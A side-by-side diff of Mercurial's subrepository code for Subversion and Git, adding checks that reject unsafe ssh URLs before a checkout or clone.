1130 if filename is not None:
1131 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1131 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1132 self._path, filename)
1132 self._path, filename)
1133 cmd.append(path)
1133 cmd.append(path)
1134 env = dict(encoding.environ)
1134 env = dict(encoding.environ)
1135 # Avoid localized output, preserve current locale for everything else.
1135 # Avoid localized output, preserve current locale for everything else.
1136 lc_all = env.get('LC_ALL')
1136 lc_all = env.get('LC_ALL')
1137 if lc_all:
1137 if lc_all:
1138 env['LANG'] = lc_all
1138 env['LANG'] = lc_all
1139 del env['LC_ALL']
1139 del env['LC_ALL']
1140 env['LC_MESSAGES'] = 'C'
1140 env['LC_MESSAGES'] = 'C'
1141 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1141 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1142 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1142 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1143 universal_newlines=True, env=env, **extrakw)
1143 universal_newlines=True, env=env, **extrakw)
1144 stdout, stderr = p.communicate()
1144 stdout, stderr = p.communicate()
1145 stderr = stderr.strip()
1145 stderr = stderr.strip()
1146 if not failok:
1146 if not failok:
1147 if p.returncode:
1147 if p.returncode:
1148 raise error.Abort(stderr or 'exited with code %d'
1148 raise error.Abort(stderr or 'exited with code %d'
1149 % p.returncode)
1149 % p.returncode)
1150 if stderr:
1150 if stderr:
1151 self.ui.warn(stderr + '\n')
1151 self.ui.warn(stderr + '\n')
1152 return stdout, stderr
1152 return stdout, stderr
1153
1153
1154 @propertycache
1154 @propertycache
1155 def _svnversion(self):
1155 def _svnversion(self):
1156 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1156 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1157 m = re.search(r'^(\d+)\.(\d+)', output)
1157 m = re.search(r'^(\d+)\.(\d+)', output)
1158 if not m:
1158 if not m:
1159 raise error.Abort(_('cannot retrieve svn tool version'))
1159 raise error.Abort(_('cannot retrieve svn tool version'))
1160 return (int(m.group(1)), int(m.group(2)))
1160 return (int(m.group(1)), int(m.group(2)))
1161
1161
1162 def _wcrevs(self):
1162 def _wcrevs(self):
1163 # Get the working directory revision as well as the last
1163 # Get the working directory revision as well as the last
1164 # commit revision so we can compare the subrepo state with
1164 # commit revision so we can compare the subrepo state with
1165 # both. We used to store the working directory one.
1165 # both. We used to store the working directory one.
1166 output, err = self._svncommand(['info', '--xml'])
1166 output, err = self._svncommand(['info', '--xml'])
1167 doc = xml.dom.minidom.parseString(output)
1167 doc = xml.dom.minidom.parseString(output)
1168 entries = doc.getElementsByTagName('entry')
1168 entries = doc.getElementsByTagName('entry')
1169 lastrev, rev = '0', '0'
1169 lastrev, rev = '0', '0'
1170 if entries:
1170 if entries:
1171 rev = str(entries[0].getAttribute('revision')) or '0'
1171 rev = str(entries[0].getAttribute('revision')) or '0'
1172 commits = entries[0].getElementsByTagName('commit')
1172 commits = entries[0].getElementsByTagName('commit')
1173 if commits:
1173 if commits:
1174 lastrev = str(commits[0].getAttribute('revision')) or '0'
1174 lastrev = str(commits[0].getAttribute('revision')) or '0'
1175 return (lastrev, rev)
1175 return (lastrev, rev)
1176
1176
1177 def _wcrev(self):
1177 def _wcrev(self):
1178 return self._wcrevs()[0]
1178 return self._wcrevs()[0]
1179
1179
1180 def _wcchanged(self):
1180 def _wcchanged(self):
1181 """Return (changes, extchanges, missing) where changes is True
1181 """Return (changes, extchanges, missing) where changes is True
1182 if the working directory was changed, extchanges is
1182 if the working directory was changed, extchanges is
1183 True if any of these changes concern an external entry and missing
1183 True if any of these changes concern an external entry and missing
1184 is True if any change is a missing entry.
1184 is True if any change is a missing entry.
1185 """
1185 """
1186 output, err = self._svncommand(['status', '--xml'])
1186 output, err = self._svncommand(['status', '--xml'])
1187 externals, changes, missing = [], [], []
1187 externals, changes, missing = [], [], []
1188 doc = xml.dom.minidom.parseString(output)
1188 doc = xml.dom.minidom.parseString(output)
1189 for e in doc.getElementsByTagName('entry'):
1189 for e in doc.getElementsByTagName('entry'):
1190 s = e.getElementsByTagName('wc-status')
1190 s = e.getElementsByTagName('wc-status')
1191 if not s:
1191 if not s:
1192 continue
1192 continue
1193 item = s[0].getAttribute('item')
1193 item = s[0].getAttribute('item')
1194 props = s[0].getAttribute('props')
1194 props = s[0].getAttribute('props')
1195 path = e.getAttribute('path')
1195 path = e.getAttribute('path')
1196 if item == 'external':
1196 if item == 'external':
1197 externals.append(path)
1197 externals.append(path)
1198 elif item == 'missing':
1198 elif item == 'missing':
1199 missing.append(path)
1199 missing.append(path)
1200 if (item not in ('', 'normal', 'unversioned', 'external')
1200 if (item not in ('', 'normal', 'unversioned', 'external')
1201 or props not in ('', 'none', 'normal')):
1201 or props not in ('', 'none', 'normal')):
1202 changes.append(path)
1202 changes.append(path)
1203 for path in changes:
1203 for path in changes:
1204 for ext in externals:
1204 for ext in externals:
1205 if path == ext or path.startswith(ext + pycompat.ossep):
1205 if path == ext or path.startswith(ext + pycompat.ossep):
1206 return True, True, bool(missing)
1206 return True, True, bool(missing)
1207 return bool(changes), False, bool(missing)
1207 return bool(changes), False, bool(missing)
1208
1208
1209 def dirty(self, ignoreupdate=False, missing=False):
1209 def dirty(self, ignoreupdate=False, missing=False):
1210 wcchanged = self._wcchanged()
1210 wcchanged = self._wcchanged()
1211 changed = wcchanged[0] or (missing and wcchanged[2])
1211 changed = wcchanged[0] or (missing and wcchanged[2])
1212 if not changed:
1212 if not changed:
1213 if self._state[1] in self._wcrevs() or ignoreupdate:
1213 if self._state[1] in self._wcrevs() or ignoreupdate:
1214 return False
1214 return False
1215 return True
1215 return True
1216
1216
1217 def basestate(self):
1217 def basestate(self):
1218 lastrev, rev = self._wcrevs()
1218 lastrev, rev = self._wcrevs()
1219 if lastrev != rev:
1219 if lastrev != rev:
1220 # Last committed rev is not the same than rev. We would
1220 # Last committed rev is not the same than rev. We would
1221 # like to take lastrev but we do not know if the subrepo
1221 # like to take lastrev but we do not know if the subrepo
1222 # URL exists at lastrev. Test it and fallback to rev it
1222 # URL exists at lastrev. Test it and fallback to rev it
1223 # is not there.
1223 # is not there.
1224 try:
1224 try:
1225 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1225 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1226 return lastrev
1226 return lastrev
1227 except error.Abort:
1227 except error.Abort:
1228 pass
1228 pass
1229 return rev
1229 return rev
1230
1230
1231 @annotatesubrepoerror
1231 @annotatesubrepoerror
1232 def commit(self, text, user, date):
1232 def commit(self, text, user, date):
1233 # user and date are out of our hands since svn is centralized
1233 # user and date are out of our hands since svn is centralized
1234 changed, extchanged, missing = self._wcchanged()
1234 changed, extchanged, missing = self._wcchanged()
1235 if not changed:
1235 if not changed:
1236 return self.basestate()
1236 return self.basestate()
1237 if extchanged:
1237 if extchanged:
1238 # Do not try to commit externals
1238 # Do not try to commit externals
1239 raise error.Abort(_('cannot commit svn externals'))
1239 raise error.Abort(_('cannot commit svn externals'))
1240 if missing:
1240 if missing:
1241 # svn can commit with missing entries but aborting like hg
1241 # svn can commit with missing entries but aborting like hg
1242 # seems a better approach.
1242 # seems a better approach.
1243 raise error.Abort(_('cannot commit missing svn entries'))
1243 raise error.Abort(_('cannot commit missing svn entries'))
1244 commitinfo, err = self._svncommand(['commit', '-m', text])
1244 commitinfo, err = self._svncommand(['commit', '-m', text])
1245 self.ui.status(commitinfo)
1245 self.ui.status(commitinfo)
1246 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1246 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1247 if not newrev:
1247 if not newrev:
1248 if not commitinfo.strip():
1248 if not commitinfo.strip():
1249 # Sometimes, our definition of "changed" differs from
1249 # Sometimes, our definition of "changed" differs from
1250 # svn one. For instance, svn ignores missing files
1250 # svn one. For instance, svn ignores missing files
1251 # when committing. If there are only missing files, no
1251 # when committing. If there are only missing files, no
1252 # commit is made, no output and no error code.
1252 # commit is made, no output and no error code.
1253 raise error.Abort(_('failed to commit svn changes'))
1253 raise error.Abort(_('failed to commit svn changes'))
1254 raise error.Abort(commitinfo.splitlines()[-1])
1254 raise error.Abort(commitinfo.splitlines()[-1])
1255 newrev = newrev.groups()[0]
1255 newrev = newrev.groups()[0]
1256 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1256 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1257 return newrev
1257 return newrev
1258
1258
1259 @annotatesubrepoerror
1259 @annotatesubrepoerror
1260 def remove(self):
1260 def remove(self):
1261 if self.dirty():
1261 if self.dirty():
1262 self.ui.warn(_('not removing repo %s because '
1262 self.ui.warn(_('not removing repo %s because '
1263 'it has changes.\n') % self._path)
1263 'it has changes.\n') % self._path)
1264 return
1264 return
1265 self.ui.note(_('removing subrepo %s\n') % self._path)
1265 self.ui.note(_('removing subrepo %s\n') % self._path)
1266
1266
1267 self.wvfs.rmtree(forcibly=True)
1267 self.wvfs.rmtree(forcibly=True)
1268 try:
1268 try:
1269 pwvfs = self._ctx.repo().wvfs
1269 pwvfs = self._ctx.repo().wvfs
1270 pwvfs.removedirs(pwvfs.dirname(self._path))
1270 pwvfs.removedirs(pwvfs.dirname(self._path))
1271 except OSError:
1271 except OSError:
1272 pass
1272 pass
1273
1273
1274 @annotatesubrepoerror
1274 @annotatesubrepoerror
1275 def get(self, state, overwrite=False):
1275 def get(self, state, overwrite=False):
1276 if overwrite:
1276 if overwrite:
1277 self._svncommand(['revert', '--recursive'])
1277 self._svncommand(['revert', '--recursive'])
1278 args = ['checkout']
1278 args = ['checkout']
1279 if self._svnversion >= (1, 5):
1279 if self._svnversion >= (1, 5):
1280 args.append('--force')
1280 args.append('--force')
1281 # The revision must be specified at the end of the URL to properly
1281 # The revision must be specified at the end of the URL to properly
1282 # update to a directory which has since been deleted and recreated.
1282 # update to a directory which has since been deleted and recreated.
1283 args.append('%s@%s' % (state[0], state[1]))
1283 args.append('%s@%s' % (state[0], state[1]))
1284
1285 # SEC: check that the ssh url is safe
1286 util.checksafessh(state[0])
1287
1284 status, err = self._svncommand(args, failok=True)
1288 status, err = self._svncommand(args, failok=True)
1285 _sanitize(self.ui, self.wvfs, '.svn')
1289 _sanitize(self.ui, self.wvfs, '.svn')
1286 if not re.search('Checked out revision [0-9]+.', status):
1290 if not re.search('Checked out revision [0-9]+.', status):
1287 if ('is already a working copy for a different URL' in err
1291 if ('is already a working copy for a different URL' in err
1288 and (self._wcchanged()[:2] == (False, False))):
1292 and (self._wcchanged()[:2] == (False, False))):
1289 # obstructed but clean working copy, so just blow it away.
1293 # obstructed but clean working copy, so just blow it away.
1290 self.remove()
1294 self.remove()
1291 self.get(state, overwrite=False)
1295 self.get(state, overwrite=False)
1292 return
1296 return
1293 raise error.Abort((status or err).splitlines()[-1])
1297 raise error.Abort((status or err).splitlines()[-1])
1294 self.ui.status(status)
1298 self.ui.status(status)
1295
1299
1296 @annotatesubrepoerror
1300 @annotatesubrepoerror
1297 def merge(self, state):
1301 def merge(self, state):
1298 old = self._state[1]
1302 old = self._state[1]
1299 new = state[1]
1303 new = state[1]
1300 wcrev = self._wcrev()
1304 wcrev = self._wcrev()
1301 if new != wcrev:
1305 if new != wcrev:
1302 dirty = old == wcrev or self._wcchanged()[0]
1306 dirty = old == wcrev or self._wcchanged()[0]
1303 if _updateprompt(self.ui, self, dirty, wcrev, new):
1307 if _updateprompt(self.ui, self, dirty, wcrev, new):
1304 self.get(state, False)
1308 self.get(state, False)
1305
1309
1306 def push(self, opts):
1310 def push(self, opts):
1307 # push is a no-op for SVN
1311 # push is a no-op for SVN
1308 return True
1312 return True
1309
1313
1310 @annotatesubrepoerror
1314 @annotatesubrepoerror
1311 def files(self):
1315 def files(self):
1312 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1316 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1313 doc = xml.dom.minidom.parseString(output)
1317 doc = xml.dom.minidom.parseString(output)
1314 paths = []
1318 paths = []
1315 for e in doc.getElementsByTagName('entry'):
1319 for e in doc.getElementsByTagName('entry'):
1316 kind = str(e.getAttribute('kind'))
1320 kind = str(e.getAttribute('kind'))
1317 if kind != 'file':
1321 if kind != 'file':
1318 continue
1322 continue
1319 name = ''.join(c.data for c
1323 name = ''.join(c.data for c
1320 in e.getElementsByTagName('name')[0].childNodes
1324 in e.getElementsByTagName('name')[0].childNodes
1321 if c.nodeType == c.TEXT_NODE)
1325 if c.nodeType == c.TEXT_NODE)
1322 paths.append(name.encode('utf-8'))
1326 paths.append(name.encode('utf-8'))
1323 return paths
1327 return paths
1324
1328
1325 def filedata(self, name, decode):
1329 def filedata(self, name, decode):
1326 return self._svncommand(['cat'], name)[0]
1330 return self._svncommand(['cat'], name)[0]
1327
1331
1328
1332
1329 class gitsubrepo(abstractsubrepo):
1333 class gitsubrepo(abstractsubrepo):
1330 def __init__(self, ctx, path, state, allowcreate):
1334 def __init__(self, ctx, path, state, allowcreate):
1331 super(gitsubrepo, self).__init__(ctx, path)
1335 super(gitsubrepo, self).__init__(ctx, path)
1332 self._state = state
1336 self._state = state
1333 self._abspath = ctx.repo().wjoin(path)
1337 self._abspath = ctx.repo().wjoin(path)
1334 self._subparent = ctx.repo()
1338 self._subparent = ctx.repo()
1335 self._ensuregit()
1339 self._ensuregit()
1336
1340
1337 def _ensuregit(self):
1341 def _ensuregit(self):
1338 try:
1342 try:
1339 self._gitexecutable = 'git'
1343 self._gitexecutable = 'git'
1340 out, err = self._gitnodir(['--version'])
1344 out, err = self._gitnodir(['--version'])
1341 except OSError as e:
1345 except OSError as e:
1342 genericerror = _("error executing git for subrepo '%s': %s")
1346 genericerror = _("error executing git for subrepo '%s': %s")
1343 notfoundhint = _("check git is installed and in your PATH")
1347 notfoundhint = _("check git is installed and in your PATH")
1344 if e.errno != errno.ENOENT:
1348 if e.errno != errno.ENOENT:
1345 raise error.Abort(genericerror % (self._path, e.strerror))
1349 raise error.Abort(genericerror % (self._path, e.strerror))
1346 elif pycompat.osname == 'nt':
1350 elif pycompat.osname == 'nt':
1347 try:
1351 try:
1348 self._gitexecutable = 'git.cmd'
1352 self._gitexecutable = 'git.cmd'
1349 out, err = self._gitnodir(['--version'])
1353 out, err = self._gitnodir(['--version'])
1350 except OSError as e2:
1354 except OSError as e2:
1351 if e2.errno == errno.ENOENT:
1355 if e2.errno == errno.ENOENT:
1352 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1356 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1353 " for subrepo '%s'") % self._path,
1357 " for subrepo '%s'") % self._path,
1354 hint=notfoundhint)
1358 hint=notfoundhint)
1355 else:
1359 else:
1356 raise error.Abort(genericerror % (self._path,
1360 raise error.Abort(genericerror % (self._path,
1357 e2.strerror))
1361 e2.strerror))
1358 else:
1362 else:
1359 raise error.Abort(_("couldn't find git for subrepo '%s'")
1363 raise error.Abort(_("couldn't find git for subrepo '%s'")
1360 % self._path, hint=notfoundhint)
1364 % self._path, hint=notfoundhint)
1361 versionstatus = self._checkversion(out)
1365 versionstatus = self._checkversion(out)
1362 if versionstatus == 'unknown':
1366 if versionstatus == 'unknown':
1363 self.ui.warn(_('cannot retrieve git version\n'))
1367 self.ui.warn(_('cannot retrieve git version\n'))
1364 elif versionstatus == 'abort':
1368 elif versionstatus == 'abort':
1365 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1369 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1366 elif versionstatus == 'warning':
1370 elif versionstatus == 'warning':
1367 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1371 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1368
1372
1369 @staticmethod
1373 @staticmethod
1370 def _gitversion(out):
1374 def _gitversion(out):
1371 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1375 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1372 if m:
1376 if m:
1373 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1377 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1374
1378
1375 m = re.search(r'^git version (\d+)\.(\d+)', out)
1379 m = re.search(r'^git version (\d+)\.(\d+)', out)
1376 if m:
1380 if m:
1377 return (int(m.group(1)), int(m.group(2)), 0)
1381 return (int(m.group(1)), int(m.group(2)), 0)
1378
1382
1379 return -1
1383 return -1
1380
1384
1381 @staticmethod
1385 @staticmethod
1382 def _checkversion(out):
1386 def _checkversion(out):
1383 '''ensure git version is new enough
1387 '''ensure git version is new enough
1384
1388
1385 >>> _checkversion = gitsubrepo._checkversion
1389 >>> _checkversion = gitsubrepo._checkversion
1386 >>> _checkversion('git version 1.6.0')
1390 >>> _checkversion('git version 1.6.0')
1387 'ok'
1391 'ok'
1388 >>> _checkversion('git version 1.8.5')
1392 >>> _checkversion('git version 1.8.5')
1389 'ok'
1393 'ok'
1390 >>> _checkversion('git version 1.4.0')
1394 >>> _checkversion('git version 1.4.0')
1391 'abort'
1395 'abort'
1392 >>> _checkversion('git version 1.5.0')
1396 >>> _checkversion('git version 1.5.0')
1393 'warning'
1397 'warning'
1394 >>> _checkversion('git version 1.9-rc0')
1398 >>> _checkversion('git version 1.9-rc0')
1395 'ok'
1399 'ok'
1396 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1400 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1397 'ok'
1401 'ok'
1398 >>> _checkversion('git version 1.9.0.GIT')
1402 >>> _checkversion('git version 1.9.0.GIT')
1399 'ok'
1403 'ok'
1400 >>> _checkversion('git version 12345')
1404 >>> _checkversion('git version 12345')
1401 'unknown'
1405 'unknown'
1402 >>> _checkversion('no')
1406 >>> _checkversion('no')
1403 'unknown'
1407 'unknown'
1404 '''
1408 '''
1405 version = gitsubrepo._gitversion(out)
1409 version = gitsubrepo._gitversion(out)
1406 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1410 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1407 # despite the docstring comment. For now, error on 1.4.0, warn on
1411 # despite the docstring comment. For now, error on 1.4.0, warn on
1408 # 1.5.0 but attempt to continue.
1412 # 1.5.0 but attempt to continue.
1409 if version == -1:
1413 if version == -1:
1410 return 'unknown'
1414 return 'unknown'
1411 if version < (1, 5, 0):
1415 if version < (1, 5, 0):
1412 return 'abort'
1416 return 'abort'
1413 elif version < (1, 6, 0):
1417 elif version < (1, 6, 0):
1414 return 'warning'
1418 return 'warning'
1415 return 'ok'
1419 return 'ok'
1416
1420
1417 def _gitcommand(self, commands, env=None, stream=False):
1421 def _gitcommand(self, commands, env=None, stream=False):
1418 return self._gitdir(commands, env=env, stream=stream)[0]
1422 return self._gitdir(commands, env=env, stream=stream)[0]
1419
1423
1420 def _gitdir(self, commands, env=None, stream=False):
1424 def _gitdir(self, commands, env=None, stream=False):
1421 return self._gitnodir(commands, env=env, stream=stream,
1425 return self._gitnodir(commands, env=env, stream=stream,
1422 cwd=self._abspath)
1426 cwd=self._abspath)
1423
1427
1424 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1428 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1425 """Calls the git command
1429 """Calls the git command
1426
1430
1427 The methods tries to call the git command. versions prior to 1.6.0
1431 The methods tries to call the git command. versions prior to 1.6.0
1428 are not supported and very probably fail.
1432 are not supported and very probably fail.
1429 """
1433 """
1430 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1434 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1431 if env is None:
1435 if env is None:
1432 env = encoding.environ.copy()
1436 env = encoding.environ.copy()
1433 # disable localization for Git output (issue5176)
1437 # disable localization for Git output (issue5176)
1434 env['LC_ALL'] = 'C'
1438 env['LC_ALL'] = 'C'
1435 # fix for Git CVE-2015-7545
1439 # fix for Git CVE-2015-7545
1436 if 'GIT_ALLOW_PROTOCOL' not in env:
1440 if 'GIT_ALLOW_PROTOCOL' not in env:
1437 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1441 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1438 # unless ui.quiet is set, print git's stderr,
1442 # unless ui.quiet is set, print git's stderr,
1439 # which is mostly progress and useful info
1443 # which is mostly progress and useful info
1440 errpipe = None
1444 errpipe = None
1441 if self.ui.quiet:
1445 if self.ui.quiet:
1442 errpipe = open(os.devnull, 'w')
1446 errpipe = open(os.devnull, 'w')
1443 if self.ui._colormode and len(commands) and commands[0] == "diff":
1447 if self.ui._colormode and len(commands) and commands[0] == "diff":
1444 # insert the argument in the front,
1448 # insert the argument in the front,
1445 # the end of git diff arguments is used for paths
1449 # the end of git diff arguments is used for paths
1446 commands.insert(1, '--color')
1450 commands.insert(1, '--color')
1447 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1451 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1448 cwd=cwd, env=env, close_fds=util.closefds,
1452 cwd=cwd, env=env, close_fds=util.closefds,
1449 stdout=subprocess.PIPE, stderr=errpipe)
1453 stdout=subprocess.PIPE, stderr=errpipe)
1450 if stream:
1454 if stream:
1451 return p.stdout, None
1455 return p.stdout, None
1452
1456
1453 retdata = p.stdout.read().strip()
1457 retdata = p.stdout.read().strip()
1454 # wait for the child to exit to avoid race condition.
1458 # wait for the child to exit to avoid race condition.
1455 p.wait()
1459 p.wait()
1456
1460
1457 if p.returncode != 0 and p.returncode != 1:
1461 if p.returncode != 0 and p.returncode != 1:
1458 # there are certain error codes that are ok
1462 # there are certain error codes that are ok
1459 command = commands[0]
1463 command = commands[0]
1460 if command in ('cat-file', 'symbolic-ref'):
1464 if command in ('cat-file', 'symbolic-ref'):
1461 return retdata, p.returncode
1465 return retdata, p.returncode
1462 # for all others, abort
1466 # for all others, abort
1463 raise error.Abort(_('git %s error %d in %s') %
1467 raise error.Abort(_('git %s error %d in %s') %
1464 (command, p.returncode, self._relpath))
1468 (command, p.returncode, self._relpath))
1465
1469
1466 return retdata, p.returncode
1470 return retdata, p.returncode
1467
1471
1468 def _gitmissing(self):
1472 def _gitmissing(self):
1469 return not self.wvfs.exists('.git')
1473 return not self.wvfs.exists('.git')
1470
1474
1471 def _gitstate(self):
1475 def _gitstate(self):
1472 return self._gitcommand(['rev-parse', 'HEAD'])
1476 return self._gitcommand(['rev-parse', 'HEAD'])
1473
1477
1474 def _gitcurrentbranch(self):
1478 def _gitcurrentbranch(self):
1475 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1479 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1476 if err:
1480 if err:
1477 current = None
1481 current = None
1478 return current
1482 return current
1479
1483
1480 def _gitremote(self, remote):
1484 def _gitremote(self, remote):
1481 out = self._gitcommand(['remote', 'show', '-n', remote])
1485 out = self._gitcommand(['remote', 'show', '-n', remote])
1482 line = out.split('\n')[1]
1486 line = out.split('\n')[1]
1483 i = line.index('URL: ') + len('URL: ')
1487 i = line.index('URL: ') + len('URL: ')
1484 return line[i:]
1488 return line[i:]
1485
1489
1486 def _githavelocally(self, revision):
1490 def _githavelocally(self, revision):
1487 out, code = self._gitdir(['cat-file', '-e', revision])
1491 out, code = self._gitdir(['cat-file', '-e', revision])
1488 return code == 0
1492 return code == 0
1489
1493
1490 def _gitisancestor(self, r1, r2):
1494 def _gitisancestor(self, r1, r2):
1491 base = self._gitcommand(['merge-base', r1, r2])
1495 base = self._gitcommand(['merge-base', r1, r2])
1492 return base == r1
1496 return base == r1
1493
1497
1494 def _gitisbare(self):
1498 def _gitisbare(self):
1495 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1499 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1496
1500
1497 def _gitupdatestat(self):
1501 def _gitupdatestat(self):
1498 """This must be run before git diff-index.
1502 """This must be run before git diff-index.
1499 diff-index only looks at changes to file stat;
1503 diff-index only looks at changes to file stat;
1500 this command looks at file contents and updates the stat."""
1504 this command looks at file contents and updates the stat."""
1501 self._gitcommand(['update-index', '-q', '--refresh'])
1505 self._gitcommand(['update-index', '-q', '--refresh'])
1502
1506
1503 def _gitbranchmap(self):
1507 def _gitbranchmap(self):
1504 '''returns 2 things:
1508 '''returns 2 things:
1505 a map from git branch to revision
1509 a map from git branch to revision
1506 a map from revision to branches'''
1510 a map from revision to branches'''
1507 branch2rev = {}
1511 branch2rev = {}
1508 rev2branch = {}
1512 rev2branch = {}
1509
1513
1510 out = self._gitcommand(['for-each-ref', '--format',
1514 out = self._gitcommand(['for-each-ref', '--format',
1511 '%(objectname) %(refname)'])
1515 '%(objectname) %(refname)'])
1512 for line in out.split('\n'):
1516 for line in out.split('\n'):
1513 revision, ref = line.split(' ')
1517 revision, ref = line.split(' ')
1514 if (not ref.startswith('refs/heads/') and
1518 if (not ref.startswith('refs/heads/') and
1515 not ref.startswith('refs/remotes/')):
1519 not ref.startswith('refs/remotes/')):
1516 continue
1520 continue
1517 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1521 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1518 continue # ignore remote/HEAD redirects
1522 continue # ignore remote/HEAD redirects
1519 branch2rev[ref] = revision
1523 branch2rev[ref] = revision
1520 rev2branch.setdefault(revision, []).append(ref)
1524 rev2branch.setdefault(revision, []).append(ref)
1521 return branch2rev, rev2branch
1525 return branch2rev, rev2branch
1522
1526
1523 def _gittracking(self, branches):
1527 def _gittracking(self, branches):
1524 'return map of remote branch to local tracking branch'
1528 'return map of remote branch to local tracking branch'
1525 # assumes no more than one local tracking branch for each remote
1529 # assumes no more than one local tracking branch for each remote
1526 tracking = {}
1530 tracking = {}
1527 for b in branches:
1531 for b in branches:
1528 if b.startswith('refs/remotes/'):
1532 if b.startswith('refs/remotes/'):
1529 continue
1533 continue
1530 bname = b.split('/', 2)[2]
1534 bname = b.split('/', 2)[2]
1531 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1535 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1532 if remote:
1536 if remote:
1533 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1537 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1534 tracking['refs/remotes/%s/%s' %
1538 tracking['refs/remotes/%s/%s' %
1535 (remote, ref.split('/', 2)[2])] = b
1539 (remote, ref.split('/', 2)[2])] = b
1536 return tracking
1540 return tracking
1537
1541
1538 def _abssource(self, source):
1542 def _abssource(self, source):
1539 if '://' not in source:
1543 if '://' not in source:
1540 # recognize the scp syntax as an absolute source
1544 # recognize the scp syntax as an absolute source
1541 colon = source.find(':')
1545 colon = source.find(':')
1542 if colon != -1 and '/' not in source[:colon]:
1546 if colon != -1 and '/' not in source[:colon]:
1543 return source
1547 return source
1544 self._subsource = source
1548 self._subsource = source
1545 return _abssource(self)
1549 return _abssource(self)
1546
1550
1547 def _fetch(self, source, revision):
1551 def _fetch(self, source, revision):
1548 if self._gitmissing():
1552 if self._gitmissing():
1553 # SEC: check for safe ssh url
1554 util.checksafessh(source)
1555
1549 source = self._abssource(source)
1556 source = self._abssource(source)
1550 self.ui.status(_('cloning subrepo %s from %s\n') %
1557 self.ui.status(_('cloning subrepo %s from %s\n') %
1551 (self._relpath, source))
1558 (self._relpath, source))
1552 self._gitnodir(['clone', source, self._abspath])
1559 self._gitnodir(['clone', source, self._abspath])
1553 if self._githavelocally(revision):
1560 if self._githavelocally(revision):
1554 return
1561 return
1555 self.ui.status(_('pulling subrepo %s from %s\n') %
1562 self.ui.status(_('pulling subrepo %s from %s\n') %
1556 (self._relpath, self._gitremote('origin')))
1563 (self._relpath, self._gitremote('origin')))
1557 # try only origin: the originally cloned repo
1564 # try only origin: the originally cloned repo
1558 self._gitcommand(['fetch'])
1565 self._gitcommand(['fetch'])
1559 if not self._githavelocally(revision):
1566 if not self._githavelocally(revision):
1560 raise error.Abort(_('revision %s does not exist in subrepository '
1567 raise error.Abort(_('revision %s does not exist in subrepository '
1561 '"%s"\n') % (revision, self._relpath))
1568 '"%s"\n') % (revision, self._relpath))
1562
1569
1563 @annotatesubrepoerror
1570 @annotatesubrepoerror
1564 def dirty(self, ignoreupdate=False, missing=False):
1571 def dirty(self, ignoreupdate=False, missing=False):
1565 if self._gitmissing():
1572 if self._gitmissing():
1566 return self._state[1] != ''
1573 return self._state[1] != ''
1567 if self._gitisbare():
1574 if self._gitisbare():
1568 return True
1575 return True
1569 if not ignoreupdate and self._state[1] != self._gitstate():
1576 if not ignoreupdate and self._state[1] != self._gitstate():
1570 # different version checked out
1577 # different version checked out
1571 return True
1578 return True
1572 # check for staged changes or modified files; ignore untracked files
1579 # check for staged changes or modified files; ignore untracked files
1573 self._gitupdatestat()
1580 self._gitupdatestat()
1574 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1581 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1575 return code == 1
1582 return code == 1
1576
1583
1577 def basestate(self):
1584 def basestate(self):
1578 return self._gitstate()
1585 return self._gitstate()
1579
1586
1580 @annotatesubrepoerror
1587 @annotatesubrepoerror
1581 def get(self, state, overwrite=False):
1588 def get(self, state, overwrite=False):
1582 source, revision, kind = state
1589 source, revision, kind = state
1583 if not revision:
1590 if not revision:
1584 self.remove()
1591 self.remove()
1585 return
1592 return
1586 self._fetch(source, revision)
1593 self._fetch(source, revision)
1587 # if the repo was set to be bare, unbare it
1594 # if the repo was set to be bare, unbare it
1588 if self._gitisbare():
1595 if self._gitisbare():
1589 self._gitcommand(['config', 'core.bare', 'false'])
